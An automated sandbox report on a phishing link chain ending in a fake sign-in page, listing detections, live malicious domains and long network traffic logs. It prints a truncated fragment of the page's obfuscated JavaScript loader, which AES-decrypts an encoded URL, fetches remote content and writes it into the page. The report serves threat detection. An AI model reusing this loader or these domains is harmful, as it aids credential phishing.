Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173

Overview

General Information

Sample URL:	https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob7
Analysis ID:	1501284
Infos:

Detection

HTMLPhisher

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish62

Yara detected HtmlPhish70

Yara detected Phisher

AI detected landing page (webpage, office document or email)

HTML page contains hidden URLs

HTML page contains suspicious javascript code

Phishing site detected (based on shot match)

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body with high number of embedded images detected

HTML page contains hidden javascript code

HTML title does not match URL

Javascript checks online IP of machine

Stores files to the Windows start menu directory

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 6900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1940,i,307545642830519153,17498039111037960446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_156	JoeSecurity_Phisher_2	Yara detected Phisher	Joe Security

HTML

Source	Rule	Description	Author	Strings
24.7.pages.csv	JoeSecurity_HtmlPhish_62	Yara detected HtmlPhish_62	Joe Security
24.8.pages.csv	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security
24.5.pages.csv	JoeSecurity_HtmlPhish_62	Yara detected HtmlPhish_62	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish62

Source: Yara match	File source: 24.7.pages.csv, type: HTML
Source: Yara match	File source: 24.5.pages.csv, type: HTML

Yara detected HtmlPhish70

Source: Yara match

File source: 24.8.pages.csv, type: HTML

Yara detected Phisher

Source: Yara match

File source: dropped/chromecache_156, type: DROPPED

HTML page contains hidden URLs

Source: https://welshpoolsharkspnu.ru/NrFB2/#J

HTTP Parser: https://thebookwormprojectonu.ru///1289.php

HTML page contains suspicious javascript code

Source: https://welshpoolsharkspnu.ru/NrFB2/#J

HTTP Parser: window.location.href = atob(

Phishing site detected (based on shot match)

Source: https://welshpoolsharkspnu.ru/NrFB2/#J	Matcher: Template: captcha matched
Source: https://welshpoolsharkspnu.ru/NrFB2/#J	Matcher: Template: captcha matched

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://welshpoolsharkspnu.ru/NrFB2/#J

HTTP Parser: async function backfire(racketeer) {  var {a,b,c,d} = json.parse(racketeer); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8);  } (async () => { document.write(await backfire(await (await fetch(await backfire(atob(`eyjhijoivktszvr2zunyu3lvnlfsczzhefzlqnhqzghieuxlsvfqm3rka3rdbwz3cg9rshvwduexu2duem9yamftmuf6qiisimmioiiym2q0mje5ymrlywq5nthinjcym2nhowu0mmfhzgq1ncisimiioii3mji1y2rkotmzmdzkmte3ztcwyme0owu4m2viogu5ywywzwexndkxzweyzjdknjm5nwu2zmq1yjdjmjawnje0mthhy2i4ntflzjriyjlizwqyngzlmzuxzdy4mjvmm2uyzjjhzdkzyji2otewyjixytlmmjm4zmmynzm2zgjlzjaxmgu2ngiwotbhodfiy2jlywqyytdmnwyzowqxyzg1yzm0zje1ndvimzg0odc3yjblmtcyyzewyzmzmzmxyjm0mwnhmzu3ogezn2zinzzjmmu2mwm4othhmzq0mti2ntjhnjy2zjflotfimgexzdbhzt...

Source: https://welshpoolsharkspnu.ru/NrFB2/#J

HTTP Parser: Number of links: 0

Source: https://welshpoolsharkspnu.ru/NrFB2/#J

HTTP Parser: Total embedded image size: 45708

Source: https://deverechemicals3.s3.amazonaws.com/Deveres3project002files.htm

HTTP Parser: Base64 decoded: 1723471961.000000

Source: https://welshpoolsharkspnu.ru/NrFB2/#J

HTTP Parser: Title: Secure sign-in does not match URL

Source: https://cdn.shopify.com/extensions/196b5c0a-f723-4efd-be3a-10cb00671e06/ctx-whatsapp-chat-marketing-21/assets/whatsapp-sharing.js

HTTP Parser: !function(){"use strict";if(window.spwhatsappisscripttagversion=!1,document.queryselectorall("script:not([src])").foreach((function(t){if(-1!==t.textcontent.indexof("function asyncload() {"))try{json.parse(t.textcontent.split("var urls = ")[1].split("for (var i = 0; i < urls.length; i++) {")[0].replace("];","]")).foreach((function(t){-1!==t.indexof("whatschat.shopiapps.in")&&(window.spwhatsappisscripttagversion=!0)}))}catch(t){}})),!0===window.spwhatsappisloaded||!0===window.spwhatsappisscripttagversion)return!1;window.spwhatsappisloaded=!0;const t=shopify.shop,e="/apps/sc",a="//shopiapps.in/whatsapp-share/script";var i,s,o,n;i="//ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js",o=function(){!function(i){if(!i||"3.4.1"!=i.fn.jquery)return console.error("whatsapp load failed! because your jquery version is low or not supported"),!1;i(window);const s=i(document),o=i("body"),n=i("head");"class"in array.prototype||(string.prototype.class=function(){return"."+this}),"class"in array.prototype||(string.prot...

Source: https://deverechemicals3.s3.amazonaws.com/Deveres3project002files.htm	HTTP Parser: No favicon
Source: https://deverechemicals3.s3.amazonaws.com/Deveres3project002files.htm	HTTP Parser: No favicon
Source: https://50ou-vasil-levski.com/tvavx.php	HTTP Parser: No favicon
Source: https://welshpoolsharkspnu.ru/NrFB2/#J	HTTP Parser: No favicon
Source: https://welshpoolsharkspnu.ru/NrFB2/#J	HTTP Parser: No favicon
Source: https://welshpoolsharkspnu.ru/NrFB2/#J	HTTP Parser: No favicon
Source: https://welshpoolsharkspnu.ru/NrFB2/#J	HTTP Parser: No favicon

Source: https://welshpoolsharkspnu.ru/NrFB2/#J

HTTP Parser: No <meta name="author".. found

Source: https://welshpoolsharkspnu.ru/NrFB2/#J

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.16:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.16:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.16:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49821 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49700 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27

Source: global traffic	DNS traffic detected: DNS query: t4w86zlc.r.sa-east-1.awstrack.me
Source: global traffic	DNS traffic detected: DNS query: deverechemicals3.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: 55db36-5b.myshopify.com
Source: global traffic	DNS traffic detected: DNS query: fonts.shopifycdn.com
Source: global traffic	DNS traffic detected: DNS query: cdn.shopify.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: monorail-edge.shopifysvc.com
Source: global traffic	DNS traffic detected: DNS query: shop.app
Source: global traffic	DNS traffic detected: DNS query: whatsapp.carthike.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: 50ou-vasil-levski.com
Source: global traffic	DNS traffic detected: DNS query: welshpoolsharkspnu.ru
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: thebookwormprojectonu.ru
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
